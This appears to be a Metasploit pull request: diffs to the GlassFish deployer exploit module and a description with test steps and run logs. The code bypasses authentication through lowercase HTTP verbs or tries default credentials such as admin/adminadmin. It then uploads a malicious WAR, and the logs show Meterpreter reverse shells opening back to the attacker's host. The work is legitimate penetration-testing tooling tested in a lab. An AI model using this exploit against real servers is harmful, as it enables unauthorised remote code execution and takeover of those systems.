+    print_status("Uploading payload...")
+    res = upload_exec({
+      :session => sid,
+      :app_base => app_base,
+      :jsp_name => jsp_name,
+      :war => war,
+      :edition => edition,
+      :version => version
+    })
   end
 end

--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -309,11 +309,11 @@ class Metasploit3 < Msf::Exploit::Remote
     #Set version.  Some GlassFish servers return banner "GlassFish v3".
     if banner =~ /(GlassFish Server|Open Source Edition) (\d\.\d)/
       version = $2
-    elsif banner =~ /GlassFish v(\d)/ and version.nil?
+    elsif banner =~ /GlassFish v(\d)/ and version == 'Unknown'
       version = $1
-    elsif banner =~ /Sun GlassFish Enterprise Server v2/ and version.nil?
+    elsif banner =~ /Sun GlassFish Enterprise Server v2/ and version == 'Unknown'
       version = '2.x'
-    elsif banner =~ /Sun Java System Application Server 9/ and version.nil?
+    elsif banner =~ /Sun Java System Application Server 9/ and version == 'Unknown'
       version = '9.x'
     end
 

--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -631,20 +631,22 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def try_glassfish_auth_bypass(version)
-    sid = false
+    sid = nil
 
     if version == '2.x' || version == '9.x'
+      print_status("Trying auth bypass...")
       res = send_glassfish_request('/applications/upload.jsf', 'get')
-      p = /<title>Deploy Enterprise Applications\/Modules/
-      if res && res.code.to_i == 200 && res.body.match(p) != nil
-        sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); /).flatten.first
+      title = '<title>Deploy Enterprise Applications/Modules</title>'
+      if res && res.code.to_i == 200 && res.body.include?(title)
+        sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); */).flatten.first
       end
     else
       # 3.0
+      print_status("Trying auth bypass...")
       res = send_glassfish_request('/common/applications/uploadFrame.jsf', 'get')
-      p = /<title>Deploy Applications or Modules/
-      if res && res.code.to_i == 200 && res.body.match(p) != nil
-        sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); /).flatten.first
+      title = '<title>Deploy Applications or Modules'
+      if res && res.code.to_i == 200 && res.body.include?(title)
+        sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); */).flatten.first
       end
     end
 

--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -21,7 +21,9 @@ class Metasploit3 < Msf::Exploit::Remote
           This module logs in to an GlassFish Server (Open Source or Commercial) using various
         methods (such as authentication bypass, default credentials, or user-supplied login),
         and deploys a malicious war file in order to get remote code execution. It has been
-        tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x.
+        tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x. Newer
+        GlassFish versions do not allow remote access (Secure Admin) by default, but is required
+        for exploitation.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>

--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def auto_target(session, res, version)
     print_status("Attempting to automatically select a target...")
 
-    res = query_serverinfo(session,version)
+    res = query_serverinfo(session, version)
     return nil unless res
     return nil unless res.body
 
@@ -601,7 +601,7 @@ class Metasploit3 < Msf::Exploit::Remote
       print_status("Error: #{rhost} did not respond on #{app_rport}.")
     end
 
-    #Sleep for a bit before cleanup
+    # Sleep for a bit before cleanup
     select(nil, nil, nil, 5)
 
     #Start undeploying
@@ -619,10 +619,8 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Undeployment complete.")
   end
 
-  def init_loginscanner(creds)
-    @cred_collection = Metasploit::Framework::CredentialCollection.new(
-      userpass_file: creds * "\n"
-    )
+  def init_loginscanner
+    @cred_collection = Metasploit::Framework::CredentialCollection.new
 
     @scanner = Metasploit::Framework::LoginScanner::Glassfish.new(
       configure_http_login_scanner(
@@ -654,30 +652,44 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def my_target_host
-    path = normalize_uri(datastore['PATH'])
-    my_target_host = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
+    my_target_host = "http://#{rhost.to_s}:#{rport.to_s}#{normalize_uri(datastore['PATH'])}"
   end
 
   def try_normal_login(version)
+    init_loginscanner
+
     case version
     when /2\.x|9\.x/
-      creds = ['admin adminadmin']
+      @cred_collection.prepend_cred(
+        Metasploit::Framework::Credential.new(
+        public: 'admin',
+        private: 'adminadmin',
+        private_type: :password
+      ))
     when /^3\./
-      creds = ['admin']
-    else
-      creds = []
+      @cred_collection.prepend_cred(
+        Metasploit::Framework::Credential.new(
+        public: 'admin',
+        private: '',
+        private_type: :password
+      ))
     end
 
-    creds << "#{datastore['USERNAME']} #{datastore['PASSWORD']}"
+    @cred_collection.prepend_cred(
+      Metasploit::Framework::Credential.new(
+      public: datastore['USERNAME'],
+      private: datastore['PASSWORD'],
+      private_type: :password
+    ))
 
-    init_loginscanner(creds)
-
+    @scanner.send_request({'uri'=>'/'})
     @scanner.version = version
     @cred_collection.each do |raw|
       cred = raw.to_credential
+      print_status("Trying to login as #{cred.public}:#{cred.private}")
       result = @scanner.attempt_login(cred)
-      if result == Metasploit::Model::Login::Status::SUCCESSFUL
-        return @scanner.:jsession
+      if result.status == Metasploit::Model::Login::Status::SUCCESSFUL
+        return @scanner.jsession
       end
     end
 
@@ -692,15 +704,11 @@ class Metasploit3 < Msf::Exploit::Remote
       return sid if sid
     end
 
-    try_normal_login(version, user, pass, 'non-default')
+    try_normal_login(version)
   end
 
-  def make_war
-    my_target = auto_target(sid, res, version) if target.name =~ /Automatic/
-    fail_with(Failure::NoTarget, "Unable to automatically select a target") unless mytarget
-
-    # Generate payload
-    p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)
+  def make_war(selected_target)
+    p = exploit_regenerate_payload(selected_target.platform, selected_target.arch)
 
     jsp_name = rand_text_alphanumeric(4+rand(32-4))
     app_base = rand_text_alphanumeric(4+rand(32-4))
@@ -708,8 +716,8 @@ class Metasploit3 < Msf::Exploit::Remote
     war = p.encoded_war({
       :app_name    => app_base,
       :jsp_name    => jsp_name,
-      :arch        => mytarget.arch,
-      :platform    => mytarget.platform
+      :arch        => selected_target.arch,
+      :platform    => selected_target.platform
     }).to_s
 
     return app_base, jsp_name, war
@@ -729,8 +737,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Set HTTP verbs. Lower-case is used to bypass auth on v3.0
     @verbs = {
-      'GET'  => (version == '3.0' || version == '2.x' || version || '9.x') ? "get" : 'GET',
-      'POST' => (version == '3.0' || version == '2.x' || version || '9.x') ? 'post' : 'POST',
+      'GET'  => (version == '3.0' || version == '2.x' || version == '9.x') ? 'get' : 'GET',
+      'POST' => (version == '3.0' || version == '2.x' || version == '9.x') ? 'post' : 'POST',
     }
 
     sid = attempt_login(version)
@@ -739,7 +747,10 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::NoAccess, "#{my_target_host()} - GlassFish - Failed to authenticate login")
     end
 
-    app_base, jsp_name, war = make_war
+    selected_target = target.name =~ /Automatic/ ? auto_target(sid, res, version) : target
+    fail_with(Failure::NoTarget, "Unable to automatically select a target") unless selected_target
+
+    app_base, jsp_name, war = make_war(selected_target)
     print_status("Uploading payload...")
     res = upload_exec({
       :session => sid,

--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -52,7 +52,8 @@ class Metasploit3 < Msf::Exploit::Remote
           OptString.new('APP_RPORT',[ true,  'The Application interface port', '8080']),
           OptString.new('USERNAME', [ false, 'The username to authenticate as','admin' ]),
           OptString.new('PASSWORD', [ false, 'The password for the specified username','' ]),
-          OptString.new('PATH', [ true,  "The URI path of the GlassFish Server", '/'])
+          OptString.new('PATH', [ true,  "The URI path of the GlassFish Server", '/']),
+          OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false])
         ], self.class)
   end
 

--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
           OptString.new('APP_RPORT',[ true,  'The Application interface port', '8080']),
           OptString.new('USERNAME', [ false, 'The username to authenticate as','admin' ]),
           OptString.new('PASSWORD', [ false, 'The password for the specified username','' ]),
-          OptString.new('PATH', [ true,  "The URI path of the GlassFish Server", '/']),
+          OptString.new('TARGETURI', [ true,  "The URI path of the GlassFish Server", '/']),
           OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false])
         ], self.class)
   end
@@ -595,7 +595,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     #Execute our payload using the application interface (no need to use auth bypass technique)
-    jsp_path = "/" + app_base + "/" + jsp_name + ".jsp"
+    jsp_path = normalize_uri(target_uri.path, app_base, "#{jsp_name}.jsp")
     nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['APP_RPORT'],
       {
         'Msf'        => framework,
@@ -682,7 +682,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def my_target_host
-    my_target_host = "http://#{rhost.to_s}:#{rport.to_s}#{normalize_uri(datastore['PATH'])}"
+    my_target_host = "http://#{rhost.to_s}:#{rport.to_s}#{normalize_uri(target_uri.path)}"
   end
 
 
@@ -740,7 +740,7 @@ class Metasploit3 < Msf::Exploit::Remote
       private_type: :password
     ))
 
-    @scanner.send_request({'uri'=>'/'})
+    @scanner.send_request({'uri'=>normalize_uri(target_uri.path)})
     @scanner.version = version
     @cred_collection.each do |raw|
       cred = raw.to_credential


### PR DESCRIPTION
This pull request addresses the following:
- Proper login support for GlassFish 9.x
- Proper exploit support for GlassFish 9.x, 4.x, 2.x (but covers other versions too)

See #5591
See #5558
## Setup

Since 9.1 update 2 and 2.1 are the ones being reported as broken, please test at least one of those.
- [x] Set up a Linux (Ubuntu) box
- [x] Open a terminal in Ubuntu, and do this:

```
sudo add-apt-repository ppa:webupd8team/java
sudo apt-get update
sudo apt-get install oracle-java8-installer
sudo apt-get install oracle-java8-set-default
sudo apt-get install libstdc++5
```
- [x] Download GlassFish 9.1 or 2.1 here: http://www.oracle.com/technetwork/middleware/glassfish/downloads/java-archive-downloads-glassfish-419424.html or here: https://glassfish.java.net/download-archive.html
- [x] The installer should be a bin file. You can chmod +x it, and then just run it. After the installation is done, make sure port 4848 is running, and try using a browser first and make sure you can login.

Note: If you installed GlassFish 9.1 first and then upgraded to Update 2, then remember to restart the server (or better, reboot and then start GlassFish again), otherwise you will hit some deployment issues.
## Test the login module

In msfconsole, do:
- [x] `use auxiliary/scanner/http/glassfish_login`
- [x] `set rhosts [IP]`
- [x] `set USERNAME [username]`
- [x] `set PASSWORD [password]`
- [x] `run`
- [x] If the user/pass is correct, it should say login successful.

In some GlassFish versions, you need to set SSL to true. If this is needed, it will be obvious to you.
## Test the exploit

In msfconsole, do:
- [x] `use exploit/multi/http/glassfish_deployer`
- [x] `set rhost [IP]`
- [x] `set USERNAME [user]`
- [x] `set PASSWORD [pass]`
- [x] `set target 3` (3 is Linux)
- [x] `set payload linux/x86/meterpreter/reverse_tcp`
- [x] `set lhost [Your IP]`
- [x] `run`
- [x] You should get a session like the following demos

Note that the exploit is reusing the same authentication code from the LoginScanner, so if the auth portion in the exploit works for you, the login module should work too. It's just different purposes.
## Demos

The following demonstrates the exploit has been tested on these versions: v2.1, 3.1.2.2, 4.1, 9.1_02, 4.0, 9.1 (Linux and Windows)

```
[*] Started reverse handler on 192.168.1.64:4444 
[*] Glassfish edition: Sun GlassFish Enterprise Server v2.1
[*] Trying auth bypass...
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /UBUnaAnuUBAe/Sg5EIbOwERkGVGIsG68JmG.jsp...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495598 bytes) to 192.168.1.148
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.148:47844) at 2015-06-25 15:23:34 -0500
[*] Getting information to undeploy...
[*] Undeploying UBUnaAnuUBAe...
[*] Undeployment complete.

meterpreter >
```

```
msf exploit(glassfish_deployer) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Glassfish edition: Sun Java System Application Server 9.1
[*] Trying auth bypass...
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /rcbwgKJSbKAblk/XUKLd2N85BJhUqNyJ5tE3mK.jsp...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495598 bytes) to 192.168.1.151
[*] Meterpreter session 2 opened (192.168.1.64:4444 -> 192.168.1.151:58631) at 2015-06-25 15:25:23 -0500
[*] Getting information to undeploy...
[*] Undeploying rcbwgKJSbKAblk...
[*] Undeployment complete.

meterpreter >
```

```
[*] Started reverse handler on 192.168.1.64:4444 
[*] Glassfish edition: GlassFish Server Open Source Edition  4.0
[*] Trying to login as admin:veryphat
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /jfNdesXYuzbviMql/KFyuPnGfZR6JLa6VnRZ9Bv0O.jsp...
[*] Sending stage (884270 bytes) to 192.168.1.109
[*] Meterpreter session 3 opened (192.168.1.64:4444 -> 192.168.1.109:2521) at 2015-06-25 15:26:34 -0500
[*] Getting information to undeploy...
[*] Undeploying jfNdesXYuzbviMql...
[*] Undeployment complete.

meterpreter >
```

```
msf exploit(glassfish_deployer) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Glassfish edition: Sun Java System Application Server 9.1_02
[*] Trying auth bypass...
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /Pfyy/aDHExESj9LvlG5Sm42CLEqI64CE.jsp...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495598 bytes) to 192.168.1.151
[*] Meterpreter session 4 opened (192.168.1.64:4444 -> 192.168.1.151:57045) at 2015-06-25 16:33:42 -0500
[*] Getting information to undeploy...
[*] Undeploying Pfyy...
[*] Undeployment complete.

meterpreter > 
```

```
msf exploit(glassfish_deployer) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Glassfish edition: GlassFish Server Open Source Edition  4.1
[*] Trying to login as admin:veryphat
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /SgtzUGZUCgQ78LhKGU4jhnJ/Xh3cUubjE5dgNJt69VioQpDigE.jsp...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495598 bytes) to 192.168.1.177
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.177:51149) at 2015-06-25 16:59:51 -0500
[*] Getting information to undeploy...
[*] Undeploying SgtzUGZUCgQ78LhKGU4jhnJ...
[*] Undeployment complete.

meterpreter > 
```

```
msf exploit(glassfish_deployer) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Glassfish edition: GlassFish Server Open Source Edition 3.1.2.2
[*] Trying to login as admin:veryphat
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /KRytiZ/OD3jjplAh3awz0Cg9x7.jsp...
[*] Sending stage (884270 bytes) to 192.168.1.168
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.168:49352) at 2015-06-25 23:49:29 -0500
[*] Getting information to undeploy...
[*] Undeploying KRytiZ...
[*] Undeployment complete.

meterpreter > 
```
